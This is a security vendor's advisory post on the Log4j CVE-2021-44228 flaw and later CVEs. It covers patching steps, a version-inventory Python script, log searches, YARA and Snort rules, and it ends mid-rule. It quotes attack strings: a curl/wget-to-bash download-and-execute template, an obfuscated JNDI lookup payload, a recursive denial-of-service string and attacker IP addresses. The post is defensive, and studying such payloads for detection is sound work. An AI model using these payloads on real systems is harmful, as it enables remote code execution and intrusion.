{"id":4189,"date":"2021-12-13T15:23:11","date_gmt":"2021-12-13T15:23:11","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=4189"},"modified":"2026-06-08T14:54:11","modified_gmt":"2026-06-08T14:54:11","slug":"log4j-how-to-protect-your-systems-cve-2021-44228","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/log4j-how-to-protect-your-systems-cve-2021-44228\/","title":{"rendered":"Log4j \u2014 how to protect your systems (CVE-2021-44228)"},"content":{"rendered":"\n<p class=\"text-align:justify wp-block-paragraph\">During the first weeks of <strong>December 2021<\/strong> we observed attacks targeting the <strong>Apache Log4j<\/strong> library. On <strong>2021-12-12<\/strong>, an official security advisory disclosed a critical <strong>Remote Code Execution<\/strong> vulnerability \u2014 <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228\"><code>CVE-2021-44228<\/code><\/a> (<code>T1190<\/code> \u2014 Exploit Public-Facing Application).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Any <strong>vulnerable system exposed to the public network<\/strong> is to be considered <strong>compromised<\/strong> given the volume of mass-exploitation activity observed worldwide \u2014 confidence high.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The Apache Software Foundation has released an <strong>emergency security update<\/strong> patching the 0-day; the fixed version at the time of writing was <strong>2.15.0<\/strong> (since superseded: see the 2021-12-20 update below, which recommends <strong>2.17.0<\/strong>).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Concurrent with the disclosure of <code>CVE-2021-44228<\/code> (Log4j 2), a similar vulnerability was identified in the <strong>1.x<\/strong> branch of the same product, affecting configurations that use the <strong>JMSAppender<\/strong> class. 
This vulnerability \u2014 <code>CVE-2021-4104<\/code> \u2014 does not depend on user-controlled log input but on the deployed configuration: it is exploitable only when the attacker can write to the Log4j configuration and point <strong>JMSAppender<\/strong> at a JNDI provider under their control. Log4j 1.x is end-of-life and receives no fix; remove JMSAppender from the configuration (or the class from the jar) or migrate to Log4j 2.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" \/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Update \u2014 2021-12-20<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">New Log4j vulnerabilities have been identified in version <strong>2.15.0<\/strong> (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45046\"><code>CVE-2021-45046<\/code><\/a>) and <strong>2.16.0<\/strong> (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45105\"><code>CVE-2021-45105<\/code><\/a>) \u2014 both shipped as patches for the originally vulnerable releases up to 2.14.1. The recommended action is to upgrade directly to <strong>2.17.0<\/strong>, which addresses the security issues observed in the previous releases.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><code>CVE-2021-45046<\/code><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The patch for <code>CVE-2021-44228<\/code> proved incomplete in non-default configurations. When the logging configuration uses a non-default Pattern Layout containing a <strong>Context Lookup<\/strong> (e.g. <code>$${ctx:loginId}<\/code>), an attacker controlling Thread Context Map (MDC) input can supply a crafted JNDI Lookup pattern, causing \u2014 in some operating environments \u2014 information leakage and <strong>remote code execution<\/strong>, and in all environments local code execution. Because the lookup sits in the layout pattern rather than in the message, the <code>log4j2.formatMsgNoLookups<\/code> mitigation does not cover this case.<br><br>Apache addresses this vulnerability in <strong>Log4j 2.16.0<\/strong>, which removes message lookups entirely and disables JNDI access by default.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><code>CVE-2021-45105<\/code><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Log4j versions from <strong>2.0-alpha1<\/strong> through <strong>2.16.0<\/strong> (excluding <strong>2.12.3<\/strong>) do not protect against uncontrolled recursion in self-referential lookups. 
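<p class=\"wp-block-paragraph\">Which of these version ranges is actually deployed, and where, is the first question on a real estate: <code>log4j-core<\/code> is rarely a stand-alone file and usually sits inside WAR\/EAR bundles or application jars. The Python script below is an added example written for this page, not Fortgale&#8217;s or Apache&#8217;s tooling: it walks a directory tree, opens every jar\/war\/ear (recursing into nested archives), reads the version from the Maven <code>pom.properties<\/code> that log4j-core ships, maps it to the CVEs above, and applies the JndiLookup-removal stopgap from the mitigation section as a zip rewrite. Assumptions: the directory tree it scans is a constructed fixture; shaded builds that relocate packages are not recognised; the Java 6 (2.3.x) branch is not modelled; pre-release tags such as 2.0-beta9 compare as their base version; 2.12.2 and 2.12.3 are treated as the Java 7 backports that carry the same fixes.<\/p>

```python
import io, os, re, tempfile, zipfile

# Added illustration, not Fortgale's or Apache's tooling: inventory log4j-core
# archives under a directory tree (including jars nested inside WAR/EAR files),
# map each version to the CVEs discussed above and apply the JndiLookup-removal
# mitigation. Assumptions: the version comes from the Maven pom.properties that
# log4j-core ships; shaded builds that relocate packages are not recognised; the
# Java 6 (2.3.x) branch is not modelled; the fixture tree below is constructed.

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear")

def parse_version(v):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None

def exposures(version):
    """CVEs a log4j-core version is still exposed to, per the advisories above."""
    v = parse_version(version)
    if v is None or v[0] != 2:
        return ["version-not-modelled"]
    backport = (2, 12, 0) <= v < (2, 13, 0)  # Java 7 branch: 2.12.2 / 2.12.3 carry the fixes
    fixed_in = {"CVE-2021-44228": ((2, 15, 0), (2, 12, 2)),
                "CVE-2021-45046": ((2, 16, 0), (2, 12, 2)),
                "CVE-2021-45105": ((2, 17, 0), (2, 12, 3))}
    return [cve for cve, (main, bp) in fixed_in.items()
            if not (v >= main or (backport and v >= bp))]

def inspect_archive(zf, label, depth=0):
    """Findings for one open ZipFile and the archives nested in it (three levels deep)."""
    names = set(zf.namelist())
    findings = []
    if POM in names:
        m = re.search(r"^version=(.+)$", zf.read(POM).decode("utf-8", "replace"), re.M)
        version = m.group(1).strip() if m else "?"
        findings.append({"archive": label, "version": version,
                         "jndi_lookup_present": JNDI_CLASS in names,
                         "exposed_to": exposures(version)})
    elif JNDI_CLASS in names:  # log4j-core classes copied in without their pom.properties
        findings.append({"archive": label, "version": "?", "jndi_lookup_present": True,
                         "exposed_to": ["version-not-modelled"]})
    if depth < 3:
        for inner in sorted(n for n in names if n.lower().endswith(ARCHIVE_EXT)):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(inner))) as nested:
                    findings += inspect_archive(nested, f"{label}!/{inner}", depth + 1)
            except zipfile.BadZipFile:
                pass
    return findings

def scan(root):
    """Walk a directory tree and inspect every jar/war/ear found in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for path in (os.path.join(dirpath, n) for n in sorted(files) if n.lower().endswith(ARCHIVE_EXT)):
            try:
                with zipfile.ZipFile(path) as zf:
                    findings += inspect_archive(zf, path)
            except zipfile.BadZipFile:
                pass
    return findings

def strip_jndi_lookup(jar_path):
    """Rewrite a top-level jar without JndiLookup.class (what 'zip -q -d' does)."""
    tmp = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename != JNDI_CLASS:
                dst.writestr(item, src.read(item.filename))
    os.replace(tmp, jar_path)  # a running JVM keeps the loaded class until restarted

def _fake_log4j_core(version):
    # Constructed stand-in for a log4j-core jar: pom.properties plus an empty JndiLookup.class.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr(JNDI_CLASS, b"")
    return buf.getvalue()

def build_fixture(root):
    """Constructed tree: a bare 2.14.1 jar, a WAR bundling 2.16.0 and a patched 2.17.0 jar."""
    lib = os.path.join(root, "lib")
    os.makedirs(lib, exist_ok=True)
    for version in ("2.14.1", "2.17.0"):
        with open(os.path.join(lib, f"log4j-core-{version}.jar"), "wb") as f:
            f.write(_fake_log4j_core(version))
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", _fake_log4j_core("2.16.0"))

def demo():
    """Scan the constructed tree, strip JndiLookup from the 2.14.1 jar, scan again."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        before = {f["version"]: f for f in scan(root)}
        strip_jndi_lookup(os.path.join(root, "lib", "log4j-core-2.14.1.jar"))
        after = {f["version"]: f for f in scan(root)}
    return before, after

if __name__ == "__main__":
    print(demo())
```

<p class=\"wp-block-paragraph\">Point <code>scan()<\/code> at application directories and unpacked container images. An archive nested deeper than three levels, or log4j-core classes copied in without their <code>pom.properties<\/code>, is reported with version <code>?<\/code> and has to be checked by hand; stripping the class from a jar only takes effect once the JVM is restarted.<\/p>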
An attacker controlling Thread Context Map data can trigger a <strong>Denial of Service<\/strong> (DoS) by injecting a crafted recursive expression \u2014 for example: <code>${${::-${::-$${::-j}}}}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Apache addresses this vulnerability in <strong>Log4j 2.17.0<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" \/>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/images.hothardware.com\/contentimages\/newsitem\/57029\/content\/Apache-Log4j-Logo.png\" alt=\"Apache Log4j Logo\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Detection and Risk Mitigation<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#Grep\">From application logs<\/a><\/li>\n\n\n\n<li><a href=\"#Yara\">YARA rule<\/a><\/li>\n\n\n\n<li><a href=\"#Snort\">Snort\/Suricata IDS<\/a><\/li>\n\n\n\n<li><a href=\"#mitigation\">Risk mitigation<\/a><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">Source countries of scanning activity<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Below is an overview of the source IP addresses we observed driving exploitation:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1004\" height=\"421\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3.png\" alt=\"\" class=\"wp-image-4190\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3.png 1004w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3-300x126.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3-768x322.png 768w\" sizes=\"(max-width: 1004px) 100vw, 1004px\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading has-text-align-center\" id=\"h-vulnerability-and-attack-details\">Vulnerability and 
Attack Details<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The technical details required to identify, analyse, and mitigate the compromise risk are documented below \u2014 closing the exposure window across heterogeneous Java estates is the kind of structured patch and posture programme delivered by our <a href=\"https:\/\/fortgale.com\/en\/cybersecurity-advisory\/\">Cybersecurity Advisory<\/a>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Affected Applications<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Any Java application that bundles <strong>log4j-core<\/strong> 2.x (directly, inside a WAR\/EAR, or shaded into its own jar) is exposed. Products known to be affected include:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Elasticsearch<\/li>\n\n\n\n<li>Logstash<\/li>\n\n\n\n<li>Graylog<\/li>\n\n\n\n<li>Minecraft (client and server) and other Java-based video games<\/li>\n\n\n\n<li>Neo4j<\/li>\n\n\n\n<li>Apache projects (Druid, Dubbo, Flink, Flume, Hadoop, Kafka, Solr, Spark, Struts, Tapestry, Wicket)<\/li>\n\n\n\n<li>VMware products (Horizon, vCenter, vRealize, HCX, NSX-T, UAG, Tanzu)<\/li>\n\n\n\n<li>Grails<\/li>\n\n\n\n<li>Custom in-house Java applications<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-vulnerability-details\">Vulnerability Details<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Apache Log4j2 versions <strong>2.0-beta9 through 2.14.1<\/strong> expose <em><strong>Java Naming and Directory Interface<\/strong><\/em> (JNDI) lookups in configuration, log messages, and parameters, and those lookups do not guard against LDAP and other JNDI endpoints controlled by malicious actors. As a result, an attacker who can influence log messages or their parameters can <strong>execute arbitrary code<\/strong> served from an LDAP server whenever Message Lookup Substitution is enabled, which it is by default before 2.15.0. 
<br>To exploit the vulnerability, attackers send an <strong>HTTP request<\/strong> (or any other input that ends up in a log statement) carrying a specially crafted string; when Log4j formats the resulting log entry it resolves that string into a JNDI (Java Naming and Directory Interface) request to an attacker-controlled server. <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The malicious server answers with a JNDI reference; processing that response on the vulnerable system either loads a class from a remote codebase or deserialises an attacker-supplied object, executing the attacker&#8217;s code inside the application&#8217;s JVM.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"mitigation\">How to mitigate the threat<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">From Log4j <strong>2.15.0<\/strong> onwards message lookup substitution is disabled by default, and 2.16.0 removes message lookups and disables JNDI access altogether. Given the follow-up issues (<code>CVE-2021-45046<\/code>, <code>CVE-2021-45105<\/code>), upgrade directly to <strong>2.17.0<\/strong>: it is the simplest and most effective fix.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Where an immediate upgrade is impossible, the following stopgaps reduce exposure:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In versions <strong>2.10 through 2.14.1<\/strong>, disable message lookups with the JVM system property or the environment variable:\n<ul class=\"wp-block-list\">\n<li><strong>-Dlog4j2.formatMsgNoLookups=true<\/strong> (system property on the Java command line)<\/li>\n\n\n\n<li><strong>LOG4J_FORMAT_MSG_NO_LOOKUPS=true<\/strong> (environment variable)<\/li>\n<\/ul>\nThis does <strong>not<\/strong> cover <code>CVE-2021-45046<\/code>, because there the lookup sits in the layout pattern rather than in the message.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In any 2.x version from <strong>2.0-beta9 to 2.14.1<\/strong> (and the only option in versions <strong>prior to 2.10<\/strong>), remove the <strong>JndiLookup<\/strong> class from the classpath:\n<ul class=\"wp-block-list\">\n<li><strong>zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class<\/strong><\/li>\n<\/ul>\nRepeat this for copies of log4j-core nested inside WAR\/EAR files or shaded into application jars, then restart the JVM: a running process keeps the class it has already loaded.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>On JDKs older than <strong>8u121<\/strong> (RMI\/CORBA) and <strong>8u191<\/strong> (LDAP), where JNDI still trusts remote codebases by default, set:\n<ul class=\"wp-block-list\">\n<li><strong>com.sun.jndi.rmi.object.trustURLCodebase<\/strong> = false<\/li>\n\n\n\n<li><strong>com.sun.jndi.cosnaming.object.trustURLCodebase<\/strong> = false<\/li>\n\n\n\n<li><strong>com.sun.jndi.ldap.object.trustURLCodebase<\/strong> = false<\/li>\n<\/ul>\nNewer JDKs already default these to false, but that only blocks remote class loading: exploitation through deserialisation gadgets or factory classes already on the classpath remains possible, so this is not a substitute for patching.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Information on ongoing 
attacks<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The <strong>jndi<\/strong> lookup is used to fetch the malicious Java object over one of several protocols (ldap, ldaps, rmi, dns, ...):<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"359\" height=\"214\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4.png\" alt=\"\" class=\"wp-image-4191\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4.png 359w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4-300x179.png 300w\" sizes=\"(max-width: 359px) 100vw, 359px\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<ul class=\"wp-block-list\">\n<li>All requests carry the malicious payload, usually in a header that is routinely logged (<strong>User-Agent<\/strong>, <strong>Referer<\/strong>, <strong>X-Forwarded-For<\/strong>) or in a URI or form parameter<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Most <em>payloads<\/em> are Base64-encoded (the <code>\/Basic\/Command\/Base64\/&lt;Base64Code&gt;<\/code> path in the LDAP URL, listed below, carries them); decoded, they are typically a download-and-execute one-liner of this shape, with the placeholders in angle brackets filled in by the attacker:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>(curl -s &lt;malicious IP&gt;:&lt;Port&gt;\/&lt;victim IP&gt;:&lt;victim Port&gt;||wget -q -O- &lt;malicious IP&gt;:&lt;Port&gt;\/&lt;victim IP&gt;:&lt;victim Port&gt;)|bash<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Observed URIs<\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>URI<\/strong> (useful for detection)<\/td><\/tr><tr><td>\/Basic\/Command\/Base64\/&lt;Base64Code&gt;<\/td><\/tr><tr><td>\/a<\/td><\/tr><tr><td>\/callback<\/td><\/tr><tr><td>\/Exploit<\/td><\/tr><tr><td>\/epepap<\/td><\/tr><tr><td>\/b<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Obfuscation methods<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>${jndi:${lower:l}${lower:d}a${lower:p}:\/\/world80.log4j.bin${upper:a}ryedge.io:80\/callback}<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">The inner <code>${lower:...}<\/code> and <code>${upper:...}<\/code> lookups are resolved before the <code>jndi<\/code> lookup runs, so the string only becomes <code>${jndi:ldap:\/\/...}<\/code> inside the logger and a signature for that literal never sees it. The <code>${::-x}<\/code> default-value form and URL encoding (<code>%24%7Bjndi<\/code>) are used the same way, which is why the log searches and YARA rules below strip or match these wrappers rather than the plain <code>${jndi:<\/code> string alone.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Attacker IPs<\/strong><\/h3>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li>159.65.194.103<\/li>\n\n\n\n<li>159.89.122.19<\/li>\n\n\n\n<li>165.22.213.246<\/li>\n\n\n\n<li>165.227.37.189<\/li>\n\n\n\n<li>167.172.44.255<\/li>\n\n\n\n<li>167.71.13.196<\/li>\n\n\n\n<li>167.99.186.227<\/li>\n\n\n\n<li>176.32.33.14<\/li>\n\n\n\n<li>178.17.174.14<\/li>\n\n\n\n<li>178.62.23.146<\/li>\n\n\n\n<li>195.54.160.149<\/li>\n\n\n\n<li>45.137.21.9<\/li>\n\n\n\n<li>45.155.205.233<\/li>\n\n\n\n<li>61.19.25.207<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Attack identification<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Grep\">From application logs<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo egrep -I -i -r '\\$(\\{|%7B)jndi:(ldap&#091;s]?|rmi|dns|nis|iiop|corba|nds|http):\/&#091;^\\n]+' \/var\/log\n\n\nsudo find \/var\/log -name \\*.gz -print0 | xargs -0 zgrep -E -i '\\$(\\{|%7B)jndi:(ldap&#091;s]?|rmi|dns|nis|iiop|corba|nds|http):\/&#091;^\\n]+'\n\n\nsudo find \/var\/log\/ -type f -exec sh -c \"cat {} | sed -e 's\/\\${lower:\/\/'g | tr -d '}' | egrep -I -i 'jndi:(ldap&#091;s]?|rmi|dns|nis|iiop|corba|nds|http):'\" \\;\n\n\nsudo find \/var\/log\/ -name '*.gz' -type f -exec sh -c \"zcat {} | sed -e 's\/\\${lower:\/\/'g | tr -d '}' | egrep -i 'jndi:(ldap&#091;s]?|rmi|dns|nis|iiop|corba|nds|http):'\" \\;\n\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Yara\">YARA<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>rule <strong>EXPL_Log4j_CVE_2021_44228_Dec21_Soft<\/strong> {\n   meta:\n      description = \"Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/h113sdx\/status\/1469010902183661568?s=20\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n      $x1 = \"${jndi:ldap:\/\"\n      $x2 = \"${jndi:rmi:\/\"\n      $x3 = \"${jndi:ldaps:\/\"\n      $x4 = \"${jndi:dns:\/\"\n   condition:\n      1 of them\n}\n\n\nrule 
<strong>EXPL_Log4j_CVE_2021_44228_Dec21_Hard<\/strong> {\n   meta:\n      description = \"Detects indicators in server logs that indicate the exploitation of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/h113sdx\/status\/1469010902183661568?s=20\"\n      date = \"2021-12-10\"\n      score = 80\n   strings:\n      $x1 = \/\\$\\{jndi:(ldap|ldaps|rmi|dns):\\\/&#091;\\\/]?&#091;a-z-\\.0-9]{3,120}:&#091;0-9]{2,5}\\\/&#091;a-zA-Z\\.]{1,32}\\}\/\n      $fp1r = \/(ldap|rmi|ldaps|dns):\\\/&#091;\\\/]?(127\\.0\\.0\\.1|192\\.168\\.|172\\.&#091;1-3]&#091;0-9]\\.|10\\.)\/\n   condition:\n      $x1 and not 1 of ($fp*)\n}\n\n\nrule <strong>SUSP_Base64_Encoded_Exploit_Indicators_Dec21<\/strong> {\n   meta:\n      description = \"Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/Reelix\/status\/1469327487243071493\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n      \/* curl -s  *\/\n      $sa1 = \"Y3VybCAtcy\"\n      $sa2 = \"N1cmwgLXMg\"\n      $sa3 = \"jdXJsIC1zI\"\n      \/* |wget -q -O-  *\/\n      $sb1 = \"fHdnZXQgLXEgLU8tI\"\n      $sb2 = \"x3Z2V0IC1xIC1PLS\"\n      $sb3 = \"8d2dldCAtcSAtTy0g\"\n   condition:\n      1 of ($sa*) and 1 of ($sb*)\n}\n\n\nrule <strong>SUSP_JDNIExploit_Indicators_Dec21<\/strong> {\n   meta:\n      description = \"Detects indicators of JDNI usage in log files and other payloads\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/github.com\/flypig5211\/JNDIExploit\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n      $xr1 = \/ldap:\\\/\\\/&#091;a-zA-Z0-9\\.]{7,80}:&#091;0-9]{2,5}\\\/(Basic\\\/Command\\\/Base64|Basic\\\/ReverseShell|Basic\\\/TomcatMemshell|Basic\\\/JBossMemshell|Basic\\\/WebsphereMemshell|Basic\\\/SpringMemshell|Basic\\\/Command|Deserialization\\\/CommonsCollectionsK|Deserialization\\\/CommonsBeanutils|Deserialization\\\/Jre8u20\\\/TomcatMemshell|Deserialization\\\/CVE_2020_2555\\\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\\\/\/\n   condition:\n      filesize &lt; 100MB and $xr1\n}\n\n\nrule <strong>SUSP_EXPL_OBFUSC_Dec21_1<\/strong> {\n   meta:\n      description = \"Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/testanull\/status\/1469549425521348609\"\n      date = \"2021-12-11\"\n      score = 60\n   strings:\n      \/* ${lower:X} - single character match *\/\n      $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }\n      \/* ${upper:X} - single character match *\/\n      $ = { 24 7B 75 70 70 65 72 3A ?? 
7D }\n      \/* URL encoded lower - obfuscation in URL *\/\n      $ = \"$%7blower:\"\n      $ = \"$%7bupper:\"\n      $ = \"%24%7bjndi:\"\n      $ = \"\/$%7bjndi:\"\n   condition:\n      1 of them\n}\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Snort\">Intrusion Detection: Snort\/Suricata <\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>alert http any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http ldap)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http rmi)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp ldap)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, 
deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp rmi)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp rmi)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp ldap)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp dns)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; 
